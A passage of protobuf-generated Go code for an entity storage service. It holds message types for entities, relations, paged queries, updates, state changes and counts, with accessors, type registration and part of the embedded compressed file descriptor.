xxx_messageInfo_HasRelations.Size(m) } func (m *HasRelations) XXX_DiscardUnknown() { xxx_messageInfo_HasRelations.DiscardUnknown(m) } var xxx_messageInfo_HasRelations proto.InternalMessageInfo func (m *HasRelations) GetRelations() map[string]bool { if m != nil { return m.Relations } return nil } type EX struct { Entity *E `protobuf:"bytes,1,opt,name=entity,proto3" json:"entity,omitempty"` Related []*EX `protobuf:"bytes,2,rep,name=related,proto3" json:"related,omitempty"` Resources []*E `protobuf:"bytes,3,rep,name=resources,proto3" json:"resources,omitempty"` Counts *Counts `protobuf:"bytes,4,opt,name=counts,proto3" json:"counts,omitempty"` HasRelations *HasRelations `protobuf:"bytes,5,opt,name=hasRelations,proto3" json:"hasRelations,omitempty"` Children 
map[string]*EXPaged `protobuf:"bytes,6,rep,name=children,proto3" json:"children,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EX) Reset() { *m = EX{} } func (m *EX) String() string { return proto.CompactTextString(m) } func (*EX) ProtoMessage() {} func (*EX) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{19} } func (m *EX) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EX.Unmarshal(m, b) } func (m *EX) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EX.Marshal(b, m, deterministic) } func (m *EX) XXX_Merge(src proto.Message) { xxx_messageInfo_EX.Merge(m, src) } func (m *EX) XXX_Size() int { return xxx_messageInfo_EX.Size(m) } func (m *EX) XXX_DiscardUnknown() { xxx_messageInfo_EX.DiscardUnknown(m) } var xxx_messageInfo_EX proto.InternalMessageInfo func (m *EX) GetEntity() *E { if m != nil { return m.Entity } return nil } func (m *EX) GetRelated() []*EX { if m != nil { return m.Related } return nil } func (m *EX) GetResources() []*E { if m != nil { return m.Resources } return nil } func (m *EX) GetCounts() *Counts { if m != nil { return m.Counts } return nil } func (m *EX) GetHasRelations() *HasRelations { if m != nil { return m.HasRelations } return nil } func (m *EX) GetChildren() map[string]*EXPaged { if m != nil { return m.Children } return nil } type EXPaged struct { List []*EX `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` HasMore bool `protobuf:"varint,2,opt,name=HasMore,proto3" json:"HasMore,omitempty"` NextFrom string `protobuf:"bytes,3,opt,name=NextFrom,proto3" json:"NextFrom,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EXPaged) Reset() { *m = EXPaged{} } func (m *EXPaged) String() string { return proto.CompactTextString(m) } func (*EXPaged) ProtoMessage() {} func (*EXPaged) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{20} } func (m *EXPaged) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EXPaged.Unmarshal(m, b) } func (m *EXPaged) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EXPaged.Marshal(b, m, deterministic) } func (m *EXPaged) XXX_Merge(src proto.Message) { xxx_messageInfo_EXPaged.Merge(m, src) } func (m *EXPaged) XXX_Size() int { return xxx_messageInfo_EXPaged.Size(m) } func (m *EXPaged) XXX_DiscardUnknown() { xxx_messageInfo_EXPaged.DiscardUnknown(m) } var xxx_messageInfo_EXPaged proto.InternalMessageInfo func (m *EXPaged) GetList() []*EX { if m != nil { return m.List } return nil } func (m *EXPaged) GetHasMore() bool { if m != nil { return m.HasMore } return false } func (m *EXPaged) GetNextFrom() string { if m != nil { return m.NextFrom } return "" } type EXList struct { List []*EX `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EXList) Reset() { *m = EXList{} } func (m *EXList) String() string { return proto.CompactTextString(m) } func (*EXList) ProtoMessage() {} func (*EXList) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{21} } func (m *EXList) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EXList.Unmarshal(m, b) } func (m *EXList) XXX_Marshal(b []byte, deterministic bool) ([]byte, 
error) { return xxx_messageInfo_EXList.Marshal(b, m, deterministic) } func (m *EXList) XXX_Merge(src proto.Message) { xxx_messageInfo_EXList.Merge(m, src) } func (m *EXList) XXX_Size() int { return xxx_messageInfo_EXList.Size(m) } func (m *EXList) XXX_DiscardUnknown() { xxx_messageInfo_EXList.DiscardUnknown(m) } var xxx_messageInfo_EXList proto.InternalMessageInfo func (m *EXList) GetList() []*EX { if m != nil { return m.List } return nil } type GetByQueryReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Queries []*Query `protobuf:"bytes,2,rep,name=queries,proto3" json:"queries,omitempty"` Sorts map[string]SortDir `protobuf:"bytes,3,rep,name=sorts,proto3" json:"sorts,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"varint,2,opt,name=value,proto3,enum=def.SortDir"` Limit *Limit `protobuf:"bytes,4,opt,name=limit,proto3" json:"limit,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *GetByQueryReq) Reset() { *m = GetByQueryReq{} } func (m *GetByQueryReq) String() string { return proto.CompactTextString(m) } func (*GetByQueryReq) ProtoMessage() {} func (*GetByQueryReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{22} } func (m *GetByQueryReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_GetByQueryReq.Unmarshal(m, b) } func (m *GetByQueryReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_GetByQueryReq.Marshal(b, m, deterministic) } func (m *GetByQueryReq) XXX_Merge(src proto.Message) { xxx_messageInfo_GetByQueryReq.Merge(m, src) } func (m *GetByQueryReq) XXX_Size() int { return xxx_messageInfo_GetByQueryReq.Size(m) } func (m *GetByQueryReq) XXX_DiscardUnknown() { xxx_messageInfo_GetByQueryReq.DiscardUnknown(m) } var xxx_messageInfo_GetByQueryReq proto.InternalMessageInfo func (m *GetByQueryReq) GetType() string { if m != nil { return m.Type } return "" } func (m *GetByQueryReq) GetQueries() []*Query { if m != nil { return m.Queries } return nil } func (m *GetByQueryReq) GetSorts() map[string]SortDir { if m != nil { return m.Sorts } return nil } func (m *GetByQueryReq) GetLimit() *Limit { if m != nil { return m.Limit } return nil } type UpdateContentReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Id string `protobuf:"bytes,2,opt,name=id,proto3" json:"id,omitempty"` Updates []*Update `protobuf:"bytes,3,rep,name=updates,proto3" json:"updates,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *UpdateContentReq) Reset() { *m = UpdateContentReq{} } func (m *UpdateContentReq) String() string { return proto.CompactTextString(m) } func (*UpdateContentReq) ProtoMessage() {} func (*UpdateContentReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{23} } func (m *UpdateContentReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_UpdateContentReq.Unmarshal(m, b) } func (m *UpdateContentReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_UpdateContentReq.Marshal(b, m, deterministic) } func (m *UpdateContentReq) XXX_Merge(src proto.Message) { xxx_messageInfo_UpdateContentReq.Merge(m, src) } func (m *UpdateContentReq) XXX_Size() int { return xxx_messageInfo_UpdateContentReq.Size(m) } func (m *UpdateContentReq) XXX_DiscardUnknown() { xxx_messageInfo_UpdateContentReq.DiscardUnknown(m) } var 
xxx_messageInfo_UpdateContentReq proto.InternalMessageInfo func (m *UpdateContentReq) GetType() string { if m != nil { return m.Type } return "" } func (m *UpdateContentReq) GetId() string { if m != nil { return m.Id } return "" } func (m *UpdateContentReq) GetUpdates() []*Update { if m != nil { return m.Updates } return nil } type SetStateReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Ids []string `protobuf:"bytes,2,rep,name=ids,proto3" json:"ids,omitempty"` State State `protobuf:"varint,3,opt,name=state,proto3,enum=def.State" json:"state,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *SetStateReq) Reset() { *m = SetStateReq{} } func (m *SetStateReq) String() string { return proto.CompactTextString(m) } func (*SetStateReq) ProtoMessage() {} func (*SetStateReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{24} } func (m *SetStateReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_SetStateReq.Unmarshal(m, b) } func (m *SetStateReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_SetStateReq.Marshal(b, m, deterministic) } func (m *SetStateReq) XXX_Merge(src proto.Message) { xxx_messageInfo_SetStateReq.Merge(m, src) } func (m *SetStateReq) XXX_Size() int { return xxx_messageInfo_SetStateReq.Size(m) } func (m *SetStateReq) XXX_DiscardUnknown() { xxx_messageInfo_SetStateReq.DiscardUnknown(m) } var xxx_messageInfo_SetStateReq proto.InternalMessageInfo func (m *SetStateReq) GetType() string { if m != nil { return m.Type } return "" } func (m *SetStateReq) GetIds() []string { if m != nil { return m.Ids } return nil } func (m *SetStateReq) GetState() State { if m != nil { return m.State } return State_StateDeleted } type DeleteReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Ids []string `protobuf:"bytes,2,rep,name=ids,proto3" json:"ids,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *DeleteReq) Reset() { *m = DeleteReq{} } func (m *DeleteReq) String() string { return proto.CompactTextString(m) } func (*DeleteReq) ProtoMessage() {} func (*DeleteReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{25} } func (m *DeleteReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_DeleteReq.Unmarshal(m, b) } func (m *DeleteReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_DeleteReq.Marshal(b, m, deterministic) } func (m *DeleteReq) XXX_Merge(src proto.Message) { xxx_messageInfo_DeleteReq.Merge(m, src) } func (m *DeleteReq) XXX_Size() int { return xxx_messageInfo_DeleteReq.Size(m) } func (m *DeleteReq) XXX_DiscardUnknown() { xxx_messageInfo_DeleteReq.DiscardUnknown(m) } var xxx_messageInfo_DeleteReq proto.InternalMessageInfo func (m *DeleteReq) GetType() string { if m != nil { return m.Type } return "" } func (m *DeleteReq) GetIds() []string { if m != nil { return m.Ids } return nil } type GetCountsReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Id string `protobuf:"bytes,2,opt,name=id,proto3" json:"id,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *GetCountsReq) Reset() { *m = GetCountsReq{} } func (m *GetCountsReq) String() string { return proto.CompactTextString(m) } func (*GetCountsReq) ProtoMessage() 
{} func (*GetCountsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{26} } func (m *GetCountsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_GetCountsReq.Unmarshal(m, b) } func (m *GetCountsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_GetCountsReq.Marshal(b, m, deterministic) } func (m *GetCountsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_GetCountsReq.Merge(m, src) } func (m *GetCountsReq) XXX_Size() int { return xxx_messageInfo_GetCountsReq.Size(m) } func (m *GetCountsReq) XXX_DiscardUnknown() { xxx_messageInfo_GetCountsReq.DiscardUnknown(m) } var xxx_messageInfo_GetCountsReq proto.InternalMessageInfo func (m *GetCountsReq) GetType() string { if m != nil { return m.Type } return "" } func (m *GetCountsReq) GetId() string { if m != nil { return m.Id } return "" } func init() { proto.RegisterEnum("def.CountType", CountType_name, CountType_value) proto.RegisterEnum("def.State", State_name, State_value) proto.RegisterEnum("def.Op", Op_name, Op_value) proto.RegisterEnum("def.UpdateAction", UpdateAction_name, UpdateAction_value) proto.RegisterEnum("def.ValueType", ValueType_name, ValueType_value) proto.RegisterEnum("def.SortDir", SortDir_name, SortDir_value) proto.RegisterType((*RType)(nil), "def.RType") proto.RegisterType((*EType)(nil), "def.EType") proto.RegisterType((*E)(nil), "def.E") proto.RegisterMapType((map[string]string)(nil), "def.E.ContentEntry") proto.RegisterMapType((map[string]string)(nil), "def.E.MetaEntry") proto.RegisterType((*DefineETypeReq)(nil), "def.DefineETypeReq") proto.RegisterType((*CreateEWithRsReq)(nil), "def.CreateEWithRsReq") proto.RegisterType((*RelationReq)(nil), "def.RelationReq") proto.RegisterType((*GetByIDsReq)(nil), "def.GetByIDsReq") proto.RegisterType((*EList)(nil), "def.EList") proto.RegisterType((*Empty)(nil), "def.Empty") proto.RegisterType((*HasRelationResp)(nil), "def.HasRelationResp") proto.RegisterType((*Query)(nil), "def.Query") proto.RegisterType((*Limit)(nil), "def.Limit") proto.RegisterType((*Update)(nil), "def.Update") proto.RegisterType((*Paged)(nil), "def.Paged") proto.RegisterType((*PagedIDs)(nil), "def.PagedIDs") proto.RegisterType((*CountByState)(nil), "def.CountByState") proto.RegisterMapType((map[string]int64)(nil), "def.CountByState.CountsEntry") proto.RegisterType((*Counts)(nil), "def.Counts") proto.RegisterMapType((map[string]*CountByState)(nil), "def.Counts.CountsEntry") proto.RegisterType((*HasRelationsReq)(nil), "def.HasRelationsReq") proto.RegisterType((*HasRelations)(nil), "def.HasRelations") proto.RegisterMapType((map[string]bool)(nil), "def.HasRelations.RelationsEntry") proto.RegisterType((*EX)(nil), "def.EX") proto.RegisterMapType((map[string]*EXPaged)(nil), "def.EX.ChildrenEntry") proto.RegisterType((*EXPaged)(nil), "def.EXPaged") proto.RegisterType((*EXList)(nil), "def.EXList") proto.RegisterType((*GetByQueryReq)(nil), "def.GetByQueryReq") proto.RegisterMapType((map[string]SortDir)(nil), "def.GetByQueryReq.SortsEntry") proto.RegisterType((*UpdateContentReq)(nil), "def.UpdateContentReq") proto.RegisterType((*SetStateReq)(nil), "def.SetStateReq") proto.RegisterType((*DeleteReq)(nil), "def.DeleteReq") proto.RegisterType((*GetCountsReq)(nil), "def.GetCountsReq") } func init() { proto.RegisterFile("storage.proto", fileDescriptor_0d2c4ccf1453ffdb) } var fileDescriptor_0d2c4ccf1453ffdb = []byte{ // 1660 bytes of a gzipped FileDescriptorProto 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xb4, 0x58, 0xcd, 0x72, 0xdb, 0x46, 
0x12, 0x16, 0x00, 0x02, 0x24, 0x9b, 0x12, 0x0d, 0xcf, 0xfa, 0x07, 0xe6, 0x7a, 0xbd, 0x5c, 0x58, 0x2e, 0x73, 0xb5, 0x16, 0xb5, 0xa2, 0xfc, 0x13, 0x3b, 0xae, 0x54, 0x59, 0x22, 0x65, 0x33, 0x91, 0x7f, 0x02, 0xc9, 0x89, 0x53, 0x89, 0x53, 0x05, 0x11, 0x23, 0x0a, 0x15, 0x12, 0xa0, 0x80, 0xa1, 0xca, 0x4c, 0x2a, 0x55, 0xb9, 0xa4, 0xe2, 0x43, 0x4e, 0x39, 0xe5, 0x1d, 0xf2, 0x06, 0x39, 0xe5, 0x96, 0x67, 0xf1, 0x03, 0xe4, 0x9e, 0x9a, 0x9e, 0x01, 0x08, 0x48, 0xae, 0x48, 0x96, 0x9d, 0x8b, 0x38, 0xd3, 0xdd, 0x33, 0xfd, 0x87, 0xfe, 0x7a, 0x5a, 0x30, 0x17, 0xb3, 0x30, 0x72, 0xfb, 0xb4, 0x39, 0x8a, 0x42, 0x16, 0x12, 0xcd, 0xa3, 0x3b, 0xb5, 0x7b, 0x7d, 0x9f, 0xed, 0x8e, 0xb7, 0x9b, 0xbd, 0x70, 0xb8, 0x44, 0x83, 0xfd, 0x70, 0x32, 0x8a, 0xc2, 0x17, 0x93, 0x25, 0x94, 0xe8, 0x2d, 0xf6, 0x69, 0xb0, 0xb8, 0xef, 0x0e, 0x7c, 0xcf, 0x65, 0x74, 0xe9, 0xd0, 0x42, 0xdc, 0x63, 0xbf, 0x52, 0x40, 0x77, 0xb6, 0x26, 0x23, 0x4a, 0x5a, 0x50, 0xd8, 0x89, 0xc2, 0xa1, 0xa5, 0xd4, 0x95, 0x46, 0x79, 0xf5, 0xd2, 0xaf, 0xaf, 0x7e, 0xd3, 0x2e, 0x44, 0xe7, 0x5b, 0x67, 0xbf, 0xfc, 0xdc, 0x5d, 0xfc, 0xfa, 0x39, 0xff, 0xf3, 0xff, 0xc5, 0xdb, 0xcf, 0xbf, 0x59, 0xbe, 0xb6, 0x7c, 0xfd, 0xdb, 0x79, 0x07, 0x65, 0x49, 0x13, 0x54, 0x16, 0x5a, 0xea, 0xb1, 0x4e, 0xa8, 0x2c, 0xe4, 0x3a, 0xf6, 0x69, 0xb4, 0x6d, 0x69, 0xc7, 0xd3, 0xc1, 0x65, 0x49, 0x0d, 0x4a, 0xc3, 0xf1, 0x80, 0xf9, 0xa3, 0x01, 0xb5, 0x0a, 0x75, 0xa5, 0x51, 0x72, 0xd2, 0x3d, 0xb9, 0x06, 0xe5, 0x5e, 0x38, 0x0e, 0x18, 0x77, 0xc0, 0xd2, 0xeb, 0x4a, 0xa3, 0xda, 0xaa, 0x36, 0x3d, 0xba, 0xd3, 0x5c, 0x4b, 0xa8, 0xce, 0x54, 0xc0, 0x7e, 0x1f, 0xf4, 0x4e, 0xe2, 0x6a, 0xe0, 0x0e, 0xe9, 0x71, 0x5d, 0xe5, 0xb2, 0xf6, 0x1f, 0x1a, 0x28, 0x1d, 0x7e, 0x12, 0x75, 0x1d, 0xf3, 0x24, 0x6a, 0xab, 0x82, 0xda, 0x6d, 0x8b, 0x20, 0x39, 0x6a, 0xb7, 0x4d, 0x4c, 0xd0, 0xba, 0xed, 0x65, 0x11, 0x03, 0x87, 0x2f, 0x05, 0xa5, 0x85, 0xde, 0x21, 0xa5, 0x25, 0x28, 0x2b, 0xe8, 0x12, 0x52, 0x56, 0xc8, 0x19, 0xd0, 0xd7, 0xb6, 0xfc, 0x21, 0xb5, 0x8c, 0xba, 0xd2, 0xd0, 0x1c, 0xb1, 0xe1, 0xd4, 0xa7, 0x48, 0x2d, 0x0a, 0x2a, 0x6e, 0x48, 0x1d, 0xf4, 0x4d, 0xe6, 0x32, 0x6a, 0x95, 0x30, 0x24, 0x80, 0x21, 0x41, 0x8a, 0x23, 0x18, 0x84, 0x40, 0x61, 0xcb, 0xed, 0xc7, 0x56, 0xb9, 0xae, 0x35, 0xca, 0x0e, 0xae, 0xc9, 0x3c, 0x14, 0x1e, 0x52, 0xe6, 0x5a, 0x50, 0xd7, 0x1a, 0x95, 0x96, 0x89, 0x87, 0x3a, 0x4d, 0x4e, 0xea, 0x04, 0x2c, 0x9a, 0x38, 0xc8, 0x25, 0x8b, 0x50, 0x5c, 0x0b, 0x03, 0x46, 0x03, 0x66, 0x55, 0x50, 0xf0, 0x1f, 0x52, 0x50, 0x52, 0x85, 0x6c, 0x22, 0xc3, 0x0d, 0xdc, 0xec, 0x85, 0x11, 0xb5, 0x66, 0x85, 0x81, 0xb8, 0x21, 0xe7, 0xc0, 0xc0, 0xc5, 0xb2, 0x35, 0x87, 0x64, 0xb9, 0x23, 0x17, 0xa1, 0xec, 0xd0, 0x38, 0x1c, 0x47, 0x3d, 0x1a, 0x5b, 0x55, 0xb4, 0x6d, 0x4a, 0xa8, 0xdd, 0x82, 0x72, 0x6a, 0x0d, 0x8f, 0xd0, 0x57, 0x74, 0x22, 0x12, 0xe1, 0xf0, 0x25, 0x57, 0xb5, 0xef, 0x0e, 0xc6, 0x54, 0x86, 0x5a, 0x6c, 0xee, 0xa8, 0xef, 0x29, 0xb5, 0x3b, 0x30, 0x9b, 0xb5, 0xee, 0x4d, 0xce, 0xda, 0x3b, 0x50, 0x6d, 0xd3, 0x1d, 0x3f, 0xa0, 0xf8, 0xe9, 0x38, 0x74, 0x8f, 0x47, 0x97, 0xa6, 0x1f, 0x41, 0x45, 0x46, 0x57, 0x70, 0x05, 0x83, 0xb4, 0xa0, 0xda, 0x8b, 0xa8, 0xcb, 0xfc, 0x30, 0xc0, 0xda, 0x8a, 0x2d, 0x15, 0x43, 0x25, 0x44, 0x91, 0xe4, 0x1c, 0x90, 0xb0, 0x3f, 0x04, 0x73, 0x8d, 0x53, 0x68, 0xe7, 0x53, 0x9f, 0xed, 0x3a, 0x31, 0xd7, 0x74, 0x06, 0x94, 0x44, 0x8b, 0x21, 0xb4, 0x38, 0x0a, 0xcf, 0x6e, 0x31, 0xa2, 0x03, 0x97, 0x51, 0x4f, 0x5e, 0x9b, 0xf0, 0x12, 0xb2, 0x3d, 0x86, 0x8a, 0xc3, 0x97, 0xfc, 0x76, 0xba, 0x47, 0x6a, 0x99, 0xca, 0x9e, 0x4a, 0x8b, 0x0a, 0x3e, 0x97, 0x56, 0xf0, 0x94, 0x73, 0xc2, 0x4a, 0xb5, 0x37, 0xa1, 0x72, 0x9f, 0xb2, 0xd5, 
0x49, 0xb7, 0x8d, 0xd6, 0xb7, 0xa0, 0xc0, 0xde, 0xa0, 0x56, 0xb8, 0x2c, 0xcf, 0x8c, 0xef, 0x89, 0x70, 0x95, 0x1d, 0xbe, 0xb4, 0x2f, 0x83, 0xde, 0xd9, 0xf0, 0x63, 0xc6, 0xbd, 0x18, 0xf8, 0x31, 0xb3, 0x94, 0x9c, 0xcf, 0x48, 0xb3, 0x8b, 0xa0, 0x77, 0x86, 0x23, 0x36, 0xb1, 0x2f, 0xc3, 0xa9, 0x07, 0x6e, 0x3c, 0x75, 0x3e, 0x1e, 0xf1, 0x2b, 0x77, 0xdd, 0x18, 0xad, 0x28, 0x39, 0x7c, 0x69, 0x7f, 0xaf, 0x80, 0xfe, 0xf1, 0x98, 0x46, 0x13, 0xf2, 0x6f, 0xd0, 0xd7, 0x7d, 0x3a, 0xf0, 0xa4, 0x8d, 0x65, 0x6e, 0x63, 0x21, 0x52, 0x4d, 0xc5, 0x11, 0x74, 0x72, 0x1e, 0xd4, 0xc7, 0x23, 0x0c, 0x4f, 0xb5, 0x55, 0x44, 0x95, 0x8f, 0x47, 0x8e, 0xfa, 0x78, 0xc4, 0x3f, 0x98, 0x4f, 0xf0, 0x83, 0x11, 0x65, 0x2c, 0x36, 0x1c, 0x8f, 0x70, 0x81, 0x9f, 0x47, 0x21, 0x83, 0x47, 0x29, 0xd5, 0x99, 0x0a, 0xd8, 0xcb, 0xa0, 0x6f, 0xf8, 0x43, 0x9f, 0xf1, 0x6a, 0x5c, 0x4f, 0xa1, 0xd7, 0xc1, 0x35, 0x57, 0x80, 0x4c, 0x54, 0xae, 0x3b, 0x62, 0x63, 0xff, 0xac, 0x80, 0xf1, 0x74, 0xc4, 0xf1, 0xfb, 0x68, 0xdb, 0xff, 0x0b, 0xc6, 0xbd, 0x1e, 0x0f, 0x83, 0xb4, 0xff, 0x34, 0x5a, 0x22, 0x4e, 0x0b, 0x86, 0x23, 0x05, 0xde, 0x89, 0x37, 0x9f, 0x81, 0xfe, 0xc4, 0xed, 0x53, 0x8f, 0x27, 0x6a, 0xe3, 0x35, 0x89, 0xc2, 0x24, 0x5a, 0x50, 0x7c, 0xe0, 0xc6, 0x0f, 0x39, 0x20, 0xa8, 0x98, 0x90, 0x64, 0xcb, 0x61, 0xfe, 0x11, 0x7d, 0xc1, 0x30, 0x0e, 0xc2, 0x8a, 0x74, 0x6f, 0x6f, 0x41, 0x09, 0xaf, 0xee, 0xb6, 0x63, 0x1e, 0xab, 0xf4, 0xf6, 0xf2, 0x5b, 0xdd, 0xfa, 0x9d, 0xc2, 0x61, 0x61, 0x1c, 0xb0, 0xd5, 0x89, 0x00, 0xc5, 0x1b, 0x60, 0x60, 0xb3, 0x88, 0xa5, 0xe9, 0xff, 0x9a, 0xb6, 0x12, 0x29, 0x22, 0x36, 0xb1, 0xc0, 0x38, 0x29, 0x5c, 0xbb, 0x0d, 0x95, 0x0c, 0xf9, 0x28, 0x70, 0xd1, 0xb2, 0xe0, 0xf2, 0x83, 0x02, 0x86, 0x38, 0x4b, 0x96, 0x0e, 0x28, 0x3f, 0x3f, 0x55, 0x1e, 0xbf, 0x56, 0xed, 0xc6, 0x51, 0x6a, 0xaf, 0x66, 0xd5, 0x56, 0x64, 0xfa, 0xb3, 0xde, 0x64, 0x2d, 0xe9, 0xe5, 0x0a, 0x27, 0x3e, 0x29, 0x6c, 0x5c, 0x84, 0x72, 0x94, 0xdc, 0x61, 0x69, 0x02, 0xc0, 0x53, 0x82, 0xfd, 0xa3, 0x02, 0xb3, 0x59, 0x2d, 0xe4, 0x83, 0xac, 0xb8, 0xf0, 0xbb, 0x8e, 0xb7, 0x65, 0xa5, 0x9a, 0xe9, 0x4a, 0x04, 0x60, 0x7a, 0xa4, 0x76, 0x17, 0xaa, 0x79, 0xe6, 0x51, 0xd1, 0x2f, 0x65, 0x7d, 0xfe, 0x5d, 0x05, 0xb5, 0xf3, 0x8c, 0x5c, 0x02, 0x83, 0x06, 0xcc, 0x67, 0x93, 0x03, 0x9e, 0x4a, 0x2a, 0xf9, 0xcf, 0x41, 0xbc, 0x15, 0x40, 0xd0, 0x79, 0x96, 0x02, 0x2e, 0x99, 0xe7, 0x7e, 0x24, 0x7d, 0x4b, 0xcb, 0x7d, 0xf7, 0x53, 0x06, 0xb9, 0x9c, 0xa6, 0xb8, 0x80, 0x8a, 0x2a, 0x99, 0x14, 0x27, 0x69, 0x25, 0x37, 0x60, 0x76, 0x37, 0xe3, 0x3c, 0x3e, 0x01, 0x92, 0xe4, 0xe5, 0x32, 0x94, 0x13, 0x23, 0xcb, 0x50, 0xea, 0xed, 0xfa, 0x03, 0x2f, 0xa2, 0x81, 0x65, 0xa0, 0x01, 0x67, 0xa5, 0x95, 0xcd, 0x35, 0x49, 0x17, 0xd1, 0x4b, 0xc5, 0x6a, 0x5d, 0x98, 0xcb, 0xb1, 0x5e, 0x13, 0x3b, 0x3b, 0xff, 0x09, 0xcd, 0xca, 0x2b, 0xb1, 0x18, 0xb3, 0x91, 0xfc, 0x02, 0x8a, 0x92, 0x4a, 0xfe, 0x99, 0xab, 0xfe, 0x34, 0x54, 0x6f, 0x53, 0xa8, 0x57, 0xc0, 0xe8, 0x3c, 0xc3, 0xf3, 0x7f, 0x75, 0xb9, 0xfd, 0x52, 0x85, 0x39, 0xec, 0x3f, 0x88, 0xed, 0x27, 0xed, 0x40, 0xf3, 0x50, 0xdc, 0x1b, 0xd3, 0xc8, 0x3f, 0xd0, 0xb4, 0xc5, 0x9d, 0x09, 0x8b, 0xac, 0x80, 0x1e, 0x87, 0x11, 0x4b, 0x92, 0x2d, 0x90, 0x22, 0xa7, 0xbc, 0xb9, 0xc9, 0xf9, 0x22, 0xe6, 0x42, 0x96, 0x3f, 0x1c, 0x06, 0x08, 0xe9, 0x85, 0xcc, 0xc3, 0x01, 0x71, 0xdd, 0x11, 0x8c, 0xda, 0x3a, 0xc0, 0xf4, 0xd8, 0x51, 0xf9, 0xa8, 0xca, 0x7c, 0xf0, 0x13, 0x6d, 0x3f, 0xca, 0xe6, 0xe3, 0xa5, 0x02, 0xa6, 0x00, 0x7a, 0xf9, 0xee, 0x39, 0x69, 0x34, 0x2e, 0x80, 0xea, 0x7b, 0xf2, 0x81, 0x9f, 0xe9, 0x30, 0xaa, 0xef, 0x91, 0x2b, 0x50, 0x1c, 0xa3, 0x8a, 0x24, 0x08, 0x95, 0x4c, 0x7f, 0x71, 0x12, 0x1e, 0x6f, 
0xb6, 0x95, 0x4d, 0xca, 0x04, 0xe0, 0x9c, 0xd0, 0x8a, 0x7a, 0xe6, 0x55, 0xb0, 0x5a, 0xe5, 0x47, 0xca, 0x3f, 0x29, 0x86, 0x2d, 0x6c, 0xe1, 0x2c, 0x1e, 0xda, 0x18, 0x5f, 0xbc, 0xda, 0xe1, 0x17, 0x2f, 0x32, 0x6c, 0x17, 0xca, 0x6d, 0x3a, 0xa0, 0x7f, 0xa3, 0x11, 0xf6, 0x73, 0x98, 0xbd, 0x4f, 0x99, 0xac, 0xe7, 0x77, 0x1e, 0xf0, 0x85, 0x8f, 0xa0, 0x9c, 0x8e, 0x35, 0x64, 0x4e, 0x6e, 0x56, 0x43, 0xb6, 0x6b, 0xce, 0x10, 0x53, 0xb6, 0x32, 0x5e, 0x2f, 0x9d, 0xc0, 0x33, 0x15, 0x52, 0x05, 0x10, 0xd2, 0x21, 0xdf, 0xab, 0xe9, 0x81, 0x47, 0x61, 0x40, 0x4d, 0x6d, 0x61, 0x4f, 0x8e, 0x08, 0xfc, 0x24, 0x2e, 0x44, 0x70, 0x3c, 0x71, 0x17, 0x52, 0x9e, 0x44, 0xfe, 0xbe, 0xcb, 0xa8, 0xa9, 0x10, 0x00, 0x03, 0x29, 0xcb, 0xa6, 0x9a, 0xae, 0x5b, 0xa6, 0x96, 0xae, 0x57, 0xcc, 0x02, 0x39, 0x05, 0x15, 0x5c, 0xaf, 0x47, 0x3e, 0x0d, 